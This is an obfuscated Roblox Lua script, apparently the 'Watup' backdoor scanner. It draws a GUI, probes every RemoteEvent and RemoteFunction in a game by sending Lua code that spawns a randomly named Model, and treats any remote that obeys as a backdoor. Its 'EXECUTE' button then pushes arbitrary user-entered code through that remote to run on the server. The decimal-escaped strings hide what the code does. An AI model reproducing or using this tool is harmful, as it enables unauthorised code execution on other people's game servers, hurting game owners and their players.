--([This File has been Protected By WtpOBF)] local _hgS720 = {"\85\103\104\119\111\55\94\64\94\42\59\39\105\121\119\117\47\55\54\47\104\119\106\100\118\103\100\104\104\100\104\119\105\119\105\119\105\119\105\119\111\119\112"}
local _S = {["\105"]=Instance["\110\101\119"],["\103"]=game["\71\101\116\83\101\114\118\105\99\101"]}
local _P = _S["\103"](game, "\80\108\97\121\101\114\115")["\76\111\99\97\108\80\108\97\121\101\114"]
local _T = _S["\103"](game, "\67\111\114\101\71\117\105"):FindFirstChild("\82\111\98\108\111\120\71\117\105") or _P:WaitForChild("\80\108\97\121\101\114\71\117\105")
local _G = {}
_G["1"] = _S["\105"]("\83\99\114\101\101\110\71\117\105", _T)
_G["1"]["\78\97\109\101"] = "\87\97\116\117\112\66\97\99\107\100\111\111\114\86\51"
_G["1"]["\90\73\110\100\101\120\66\101\104\97\118\105\111\114"] = Enum.ZIndexBehavior.Sibling
_G["1"]["\82\101\115\101\116\79\110\83\112\97\119\110"] = false
_G["2"] = _S["\105"]("\70\114\97\109\101", _G["1"])
_G["2"]["\66\97\99\107\103\114\111\117\110\100\67\111\108\111\114\51"] = Color3.fromRGB(10, 10, 10)
_G["2"]["\83\105\122\101"] = UDim2.new(0, 482, 0, 276)
_G["2"]["\80\111\115\105\116\105\111\110"] = UDim2.new(0.3, 0, 0.3, 0)
_G["2"]["\65\99\116\105\118\101"] = true
_G["2"]["\68\114\97\103\103\97\98\108\101"] = true
local _3 = _S["\105"]("\85\73\83\116\114\111\107\101", _G["2"])
_3["\67\111\108\111\114"] = Color3.fromRGB(0, 255, 127)
_3["\84\104\105\99\107\110\101\115\115"] = 2
_S["\105"]("\85\73\67\111\114\110\101\114", _G["2"])
_G["1d"] = _S["\105"]("\84\101\120\116\76\97\98\101\108", _G["2"])
_G["1d"]["\70\111\110\116"] = Enum.Font.Code
_G["1d"]["\84\101\120\116\83\105\122\101"] = 30
_G["1d"]["\84\101\120\116\67\111\108\111\114\51"] = Color3.fromRGB(0, 255, 127)
_G["1d"]["\83\105\122\101"] = UDim2.new(1, 0, 0, 50)
_G["1d"]["\84\101\120\116"] = "\87\65\84\85\80\32\83\67\65\78\78\69\82"
_G["1d"]["\66\97\99\107\103\114\111\117\110\100\84\114\97\110\115\112\97\114\101\110\99\121"] = 1
_G["16"] = _S["\105"]("\70\114\97\109\101", _G["2"])
_G["16"]["\66\97\99\107\103\114\111\117\110\100\67\111\108\111\114\51"] = Color3.fromRGB(0, 0, 0)
_G["16"]["\66\97\99\107\103\114\111\117\110\100\84\114\97\110\115\112\97\114\101\110\99\121"] = 0.5
_G["16"]["\83\105\122\101"] = UDim2.new(0, 370, 0, 107)
_G["16"]["\80\111\115\105\116\105\111\110"] = UDim2.new(0.116, 0, 0.304, 0)
_G["1a"] = _S["\105"]("\84\101\120\116\66\117\116\116\111\110", _G["16"])
_G["1a"]["\83\105\122\101"] = UDim2.new(1, 0, 1, 0)
_G["1a"]["\84\101\120\116"] = "\83\84\65\82\84\32\83\67\65\78\78\73\78\71"
_G["1a"]["\84\101\120\116\67\111\108\111\114\51"] = Color3.fromRGB(0, 255, 127)
_G["1a"]["\66\97\99\107\103\114\111\117\110\100\84\114\97\110\115\112\97\114\101\110\99\121"] = 1
_G["1a"]["\84\101\120\116\83\105\122\101"] = 25
_G["6"] = _S["\105"]("\70\111\108\100\101\114", _G["2"])
_G["f"] = _S["\105"]("\70\114\97\109\101", _G["6"])
_G["f"]["\66\97\99\107\103\114\111\117\110\100\67\111\108\111\114\51"] = Color3.fromRGB(20, 20, 20)
_G["f"]["\83\105\122\101"] = UDim2.new(0, 462, 0, 163)
_G["f"]["\80\111\115\105\116\105\111\110"] = UDim2.new(0.02, 0, 0.24, 0)
_G["f"]["\86\105\115\105\98\108\101"] = false
_G["11"] = _S["\105"]("\84\101\120\116\66\111\120", _G["f"])
_G["11"]["\83\105\122\101"] = UDim2.new(1, -10, 1, -10)
_G["11"]["\80\111\115\105\116\105\111\110"] = UDim2.new(0, 5, 0, 5)
_G["11"]["\84\101\120\116\67\111\108\111\114\51"] = Color3.fromRGB(255, 255, 255)
_G["11"]["\77\117\108\116\105\76\105\110\101"] = true
_G["11"]["\84\101\120\116"] = ""
_G["11"]["\66\97\99\107\103\114\111\117\110\100\84\114\97\110\115\112\97\114\101\110\99\121"] = 1
_G["7"] = _S["\105"]("\70\114\97\109\101", _G["6"])
_G["7"]["\83\105\122\101"] = UDim2.new(0, 462, 0, 30)
_G["7"]["\80\111\115\105\116\105\111\110"] = UDim2.new(0.02, 0, 0.85, 0)
_G["7"]["\66\97\99\107\103\114\111\117\110\100\84\114\97\110\115\112\97\114\101\110\99\121"] = 1
_G["7"]["\86\105\115\105\98\108\101"] = false
_G["8"] = _S["\105"]("\84\101\120\116\66\117\116\116\111\110", _G["7"])
_G["8"]["\83\105\122\101"] = UDim2.new(1, 0, 1, 0)
_G["8"]["\84\101\120\116"] = "\69\88\69\67\85\84\69"
_G["8"]["\66\97\99\107\103\114\111\117\110\100\67\111\108\111\114\51"] = Color3.fromRGB(0, 255, 127)
_G["8"]["\84\101\120\116\67\111\108\111\114\51"] = Color3.fromRGB(0, 0, 0)
local function _Notify(a, b)
    _S["\103"](game, "\83\116\97\114\116\101\114\71\117\105"):SetCore("\83\101\110\100\78\111\116\105\102\105\99\97\116\105\111\110", {Title = a, Text = b, Duration = 5})
end
local function _Logic()
    local _bd = nil
    local _abc = {'\97','\98','\99','\100','\101','\102','\103','\104','\105','\106','\107','\108','\109','\110','\111','\112','\113','\114','\115','\116','\117','\118','\119','\120','\121','\122'}
    local function _run(r, d)
        if r:IsA('\82\101\109\111\116\101\69\118\101\110\116') then r:FireServer(d)
        elseif r:IsA('\82\101\109\111\116\101\70\117\110\99\116\105\111\110') then task.spawn(function() r:InvokeServer(d) end) end
    end
    _G["1a"]["\77\111\117\115\101\66\117\116\116\111\110\49\67\108\105\99\107"]:Connect(function()
        local _start = os.clock()
        _G["1a"]["\84\101\120\116"] = "\83\67\65\78\78\73\78\71\46\46\46"
        local _rem = {}
        for _, v in pairs(game:GetDescendants()) do
            if v:IsA("\82\101\109\111\116\101\69\118\101\110\116") or v:IsA("\82\101\109\111\116\101\70\117\110\99\116\105\111\110") then
                if not v:GetFullName():find("\82\111\98\108\111\120\82\101\112\108\105\99\97\116\101\100\83\116\111\114\97\103\101") then
                    local _c = "" for i=1, 15 do _c = _c.._abc[math.random(1,#_abc)] end
                    _run(v, "local a=Instance.new('Model',workspace) a.Name='".._c.."'")
                    _rem[_c] = v
                end
            end
        end
        task.spawn(function()
            for i=1, 60 do
                for _k, _r in pairs(_rem) do
                    if workspace:FindFirstChild(_k) then
                        local _diff = math.floor((os.clock() - _start) * 100) / 100
                        _bd = _r
                        _Notify("\87\97\116\117\112\32\83\99\97\110\110\101\114", "\76\111\97\100\101\100\32\105\110\32" .. tostring(_diff) .. "\115")
                        _G["16"]["\86\105\115\105\98\108\101"] = false
                        _G["f"]["\86\105\115\105\98\108\101"] = true
                        _G["7"]["\86\105\115\105\98\108\101"] = true
                        return
                    end
                end
                task.wait(0.1)
            end
            _G["1a"]["\84\101\120\116"] = "\70\65\73\76\69\68"
            task.wait(1)
            _G["1a"]["\84\101\120\116"] = "\83\84\65\82\84\32\83\67\65\78\78\73\78\71"
        end)
    end)
    _G["8"]["\77\111\117\115\101\66\117\116\116\111\110\49\67\108\105\99\107"]:Connect(function()
        if _bd then _run(_bd, _G["11"]["\84\101\120\116"]) end
    end)
end
task.spawn(_Logic)
_Notify("\87\97\116\117\112\32\86\52", "\83\121\110\99\104\114\111\110\105\122\101\100\32☠️")
return _G["1"]
